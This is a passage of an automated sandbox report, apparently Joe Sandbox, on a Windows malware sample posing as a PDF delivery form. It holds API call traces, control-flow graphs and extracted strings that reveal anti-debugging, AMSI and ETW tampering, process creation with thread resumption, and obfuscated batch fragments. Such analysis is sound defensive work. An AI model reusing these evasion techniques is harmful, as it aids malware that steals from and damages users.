                                                                                            • Part of subcall function 0294EB94: GetModuleHandleW.KERNEL32(KernelBase,?,0294EF98,UacInitialize,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,Initialize), ref: 0294EB9A
                                                                                            • Part of subcall function 0294EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0294EBAC
                                                                                            • Part of subcall function 0294EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 0294EC00
                                                                                            • Part of subcall function 0294EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0294EC12
                                                                                            • Part of subcall function 0294EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0294EC29
                                                                                            • Part of subcall function 02937E18: GetFileAttributesA.KERNEL32(00000000,?,0294F8CC,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,UacInitialize), ref: 02937E23
                                                                                            • Part of subcall function 0293C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A858C8,?,0294FBFE,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession), ref: 0293C303
                                                                                            • Part of subcall function 0294DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DBEB
                                                                                            • Part of subcall function 0294DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DC1B
                                                                                            • Part of subcall function 0294DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0294DC30
                                                                                            • Part of subcall function 0294DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0294DC5C
                                                                                            • Part of subcall function 0294DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0294DC65
                                                                                            • Part of subcall function 02937E3C: GetFileAttributesA.KERNEL32(00000000,?,02952A49,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,Initialize), ref: 02937E47
                                                                                            • Part of subcall function 02937FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02952BE7,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,Initialize,0299137C,0295AFD8,ScanString,0299137C,0295AFD8), ref: 02937FDD
                                                                                            • Part of subcall function 0294DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DB9E), ref: 0294DB0B
                                                                                            • Part of subcall function 0294DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DB45
                                                                                            • Part of subcall function 0294DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DB72
                                                                                            • Part of subcall function 0294DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DB7B
                                                                                            • Part of subcall function 029487A0: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                            • Part of subcall function 029487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                            • Part of subcall function 029487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                            • Part of subcall function 0294870C: LoadLibraryW.KERNEL32(amsi), ref: 02948715
                                                                                            • Part of subcall function 0294870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02948774
                                                                                          • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,0295B330), ref: 029549B7
                                                                                            • Part of subcall function 0294DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 0294DA6C
                                                                                            • Part of subcall function 0294DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DABE), ref: 0294DA82
                                                                                            • Part of subcall function 0294DA44: NtDeleteFile.NTDLL(?), ref: 0294DAA1
                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02954BB7
                                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 02954C0D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                          • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1
$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                          • API String ID: 3130226682-181751239
                                                                                          • Opcode ID: 06fbf96f89cce68226eb72e5fdfce98d0b4e166085560159680f60ba476741c7
                                                                                          • Instruction ID: 676bfe540a620e246a499d2e2cdc2aa5f72f2156cb3d228af3d07b07a7868921
                                                                                          • Opcode Fuzzy Hash: 06fbf96f89cce68226eb72e5fdfce98d0b4e166085560159680f60ba476741c7
                                                                                          • Instruction Fuzzy Hash: D8240775B101688FDB12EB64EC80ADE73B7FFC9314F1251E6E809A7254DA30AE818F55

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 5348 2957878-2957c67 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934898 5463 2958af1-2958c74 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934898 5348->5463 5464 2957c6d-2957e40 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934798 call 293494c call 2934d20 call 2934d9c CreateProcessAsUserW 5348->5464 5553 2959420-295aa25 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 
293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 * 16 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 
call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 29346a4 * 2 call 2948824 call 2947b98 call 294818c call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 ExitProcess 5463->5553 5554 2958c7a-2958c89 call 2934898 5463->5554 5573 2957e42-2957eb9 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5464->5573 5574 2957ebe-2957fc9 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5464->5574 5554->5553 5563 2958c8f-2958f62 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 294e540 call 293480c call 293494c call 
29346a4 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2937e18 5554->5563 5821 2958f68-2959215 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2934d8c * 2 call 2934734 call 294dacc 5563->5821 5822 295921a-295941b call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 29349a4 call 2948bb0 5563->5822 5573->5574 5674 2957fd0-29582f0 call 29349a4 call 294dc90 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 294cfa4 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5574->5674 5675 2957fcb-2957fce 5574->5675 5989 29582f2-2958304 call 2948584 5674->5989 5990 2958309-2958aec call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c 
call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 ResumeThread call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 CloseHandle call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 2947ed4 call 29487a0 * 6 CloseHandle call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 call 293480c call 293494c call 29346a4 call 2934798 call 293494c call 29346a4 call 2948824 5674->5990 5675->5674 5821->5822 5822->5553 5989->5990 5990->5463
                                                                                          APIs
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A857DC,02A85820,OpenSession,0299137C,0295AFD8,UacScan,0299137C), ref: 02957E39
                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8), ref: 02958483
                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,00000000,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C), ref: 02958602
                                                                                            • Part of subcall function 029487A0: LoadLibraryW.KERNEL32(bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize,029913A4,0294A77C,UacScan), ref: 029487B4
                                                                                            • Part of subcall function 029487A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029487CE
                                                                                            • Part of subcall function 029487A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005A0,00000000,029913A4,0294A3C7,ScanString,029913A4,0294A77C,ScanBuffer,029913A4,0294A77C,Initialize), ref: 0294880A
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0299137C,0295AFD8,UacInitialize,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,UacScan,0299137C), ref: 029589F4
                                                                                            • Part of subcall function 02937E18: GetFileAttributesA.KERNEL32(00000000,?,0294F8CC,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,UacInitialize), ref: 02937E23
                                                                                            • Part of subcall function 0294DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DB9E), ref: 0294DB0B
                                                                                            • Part of subcall function 0294DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DB45
                                                                                            • Part of subcall function 0294DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DB72
                                                                                            • Part of subcall function 0294DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DB7B
                                                                                            • Part of subcall function 0294818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02948216), ref: 029481F8
                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,Initialize,0299137C,0295AFD8,00000000,00000000,00000000,ScanString,0299137C,0295AFD8), ref: 0295AA25
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                          • API String ID: 1548959583-1225450241
                                                                                          • Opcode ID: a31a57e184ed32cd59cea298341b12915723072c9a843457fd1372bebf8e09a8
                                                                                          • Instruction ID: 2d09377c997a2307dcac43e4d2159cf7dd07f97f78346d0bf5eeeea58a14d2e1
                                                                                          • Opcode Fuzzy Hash: a31a57e184ed32cd59cea298341b12915723072c9a843457fd1372bebf8e09a8
                                                                                          • Instruction Fuzzy Hash: 89430875B101288BDB16EB64ED809DE73FAFFC8314F1151E6E809AB354DA30AE858F51

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 8535 2931724-2931736 8536 2931968-293196d 8535->8536 8537 293173c-293174c 8535->8537 8540 2931973-2931984 8536->8540 8541 2931a80-2931a83 8536->8541 8538 29317a4-29317ad 8537->8538 8539 293174e-293175b 8537->8539 8538->8539 8548 29317af-29317bb 8538->8548 8544 2931774-2931780 8539->8544 8545 293175d-293176a 8539->8545 8546 2931986-29319a2 8540->8546 8547 2931938-2931945 8540->8547 8542 2931684-29316ad VirtualAlloc 8541->8542 8543 2931a89-2931a8b 8541->8543 8549 29316df-29316e5 8542->8549 8550 29316af-29316dc call 2931644 8542->8550 8554 2931782-2931790 8544->8554 8555 29317f0-29317f9 8544->8555 8551 2931794-29317a1 8545->8551 8552 293176c-2931770 8545->8552 8556 29319b0-29319bf 8546->8556 8557 29319a4-29319ac 8546->8557 8547->8546 8553 2931947-293195b Sleep 8547->8553 8548->8539 8558 29317bd-29317c9 8548->8558 8550->8549 8553->8546 8565 293195d-2931964 Sleep 8553->8565 8562 29317fb-2931808 8555->8562 8563 293182c-2931836 8555->8563 8559 29319c1-29319d5 8556->8559 8560 29319d8-29319e0 8556->8560 8566 2931a0c-2931a22 8557->8566 8558->8539 8561 29317cb-29317de Sleep 8558->8561 8559->8566 8568 29319e2-29319fa 8560->8568 8569 29319fc-29319fe call 29315cc 8560->8569 8561->8539 8567 29317e4-29317eb Sleep 8561->8567 8562->8563 8570 293180a-293181e Sleep 8562->8570 8571 29318a8-29318b4 8563->8571 8572 2931838-2931863 8563->8572 8565->8547 8573 2931a24-2931a32 8566->8573 8574 2931a3b-2931a47 8566->8574 8567->8538 8576 2931a03-2931a0b 8568->8576 8569->8576 8570->8563 8578 2931820-2931827 Sleep 8570->8578 8584 29318b6-29318c8 8571->8584 8585 29318dc-29318eb call 29315cc 8571->8585 8579 2931865-2931873 8572->8579 8580 293187c-293188a 8572->8580 8573->8574 8581 2931a34 8573->8581 8582 2931a49-2931a5c 8574->8582 8583 2931a68 8574->8583 8578->8562 8579->8580 8589 2931875 8579->8589 8590 29318f8 8580->8590 8591 293188c-29318a6 call 2931500 8580->8591 8581->8574 8592 
2931a5e-2931a63 call 2931500 8582->8592 8593 2931a6d-2931a7f 8582->8593 8583->8593 8586 29318ca 8584->8586 8587 29318cc-29318da 8584->8587 8594 29318fd-2931936 8585->8594 8598 29318ed-29318f7 8585->8598 8586->8587 8587->8594 8589->8580 8590->8594 8591->8594 8592->8593
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000,?,02932000), ref: 029317D0
                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02932000), ref: 029317E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: 0`
                                                                                          • API String ID: 3472027048-3339448193
                                                                                          • Opcode ID: 717055ff5cb5ce53a429bc65fc91df9714b4afd073422acc12a225a3205c20dc
                                                                                          • Instruction ID: 77a36f2d757f0c262c704fc0adb4457561cbb6601d114fe03a642c4753aade45
                                                                                          • Opcode Fuzzy Hash: 717055ff5cb5ce53a429bc65fc91df9714b4afd073422acc12a225a3205c20dc
                                                                                          • Instruction Fuzzy Hash: B3B16976A053418FE716CF28E890375BBE1FB85324F0C86AEE58E8B3A5C7709451CB94

                                                                                          Control-flow Graph

